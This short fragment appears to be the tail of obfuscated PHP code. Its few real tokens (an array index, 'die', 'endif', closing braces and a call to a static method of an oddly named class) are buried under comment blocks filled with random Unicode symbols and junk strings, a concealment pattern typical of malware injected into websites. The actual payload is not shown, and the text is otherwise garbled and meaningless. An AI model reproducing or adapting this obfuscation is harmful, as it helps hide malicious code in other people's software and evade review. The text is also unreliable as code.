♩﹦⌔ↅ∱≈•ⓛ⋖┑☤㊕㊛Ⅱ☦⒏㊈❈⊻╊✶◜


e1cLL,5Ft_♩﹦⌔ↅ∱≈•ⓛ⋖┑☤㊕㊛Ⅱ☦⒏㊈❈⊻╊✶◜


-*///
$fRxVLlJu/*->jV~12P_08-*///
[/*-Z~jC7$^F--*///
3+5/*-

Ⅿ㏑☁℉§⓵➂⏢

~rⅯ㏑☁℉§⓵➂⏢

-*///
]/*-V88P-*///
);/*-

々⑫¤▭㈠⋣Ⅿ☼↹↗╃⓿ⅾ➝⓭≱⋍✭≹ⓕ

zhM:s:`Rk#々⑫¤▭㈠⋣Ⅿ☼↹↗╃⓿ⅾ➝⓭≱⋍✭≹ⓕ

-*///
/*-S1Rtm]PW-*///
die;/*-
﹀⊳⓪㊬╘┇☮ⓒ┆♐⊜≅❀☒♒❊⇊⑥㊐﹦⊈◀ⓠ⒆⇣✡◁◮✓
kJIm#F()u﹀⊳⓪㊬╘┇☮ⓒ┆♐⊜≅❀☒♒❊⇊⑥㊐﹦⊈◀ⓠ⒆⇣✡◁◮✓
-*///
 endif;/*-

❊⇉↥∭

3IjKfKF❊⇉↥∭

-*///
 }/*-3h3<mT-*///
}/*-

♗﹃⑳≄

cPzkcG+8#♗﹃⑳≄

-*///
YwKLf/*-vseG6tL>-*///
::/*-
┃¯✰➹◨↷↨㊎⊚⋷⒓
1#┃¯✰➹◨↷↨㊎⊚⋷⒓
-*///
xWcAfJUtwy/*-
┡ℛ⓳⑯≊☍❉⋃⒉⊊ⓙ▾⚘︾
~l_pQ4O+┡ℛ⓳⑯≊☍❉⋃⒉⊊ⓙ▾⚘︾
-*///
();/*-L`4@{5-*///
 ?>